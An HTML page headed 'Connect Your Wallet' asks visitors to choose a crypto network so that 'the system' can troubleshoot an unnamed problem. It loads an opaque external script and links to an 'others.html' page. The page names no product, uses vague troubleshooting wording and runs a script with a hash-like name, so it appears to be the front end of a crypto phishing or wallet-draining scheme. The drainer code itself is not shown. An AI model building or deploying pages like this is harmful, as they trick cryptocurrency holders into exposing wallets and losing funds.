<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script charset="UTF-8" async type="text/javascript" src="./357.3fc13dac1adaeba5fe21a6a.js"></script>
    <title>Connect Your Wallet</title>
    <style>
        body {
            background-color: #0b1424;
            color: #fff;
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .container {
            text-align: center;
            background-color: #fff;
            border-radius: 10px;
            padding: 20px;
            box-shadow: 0 0 20px rgba(0, 0, 0, 0.1);
        }

        .container h1 {
            color: #0b1424;
            font-size: 18px;
            margin-bottom: 20px;
        }

        .network-options {
            display: flex;
            flex-direction: column;
        }

        button {
            background-color: #fff;
            color: #0b1424;
            border: 1px solid #ccc;
            border-radius: 5px;
            padding: 10px;
            margin: 10px 0;
            cursor: pointer;
            font-size: 16px;
            transition: background-color 0.3s;
        }

        button:hover {
            background-color: #f0f0f0;
        }

        .connectButton {
            background-color: #007bff;
            color: #fff;
            border: none;
        }

        .connectButton:hover {
            background-color: #0056b3;
        }

        .otherButton {
            background-color: #28a745;
            color: #fff;
            border: none;
        }

        .otherButton:hover {
            background-color: #218838;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>To help the system to easily Troubleshoot this problem please choose by clicking your network from the options below but if you do not know your network, no problem just click other networks:</h1>
        <div class="network-options">
            <button class="connectButton">Ethereum Network</button>
            <button class="connectButton">Tron Network</button>
            <button class="connectButton">Ton Network</button>
            <button class="otherButton" onclick="window.location.href='others.html'">Other Networks</button>
        </div>
    </div>
</body>
</html>
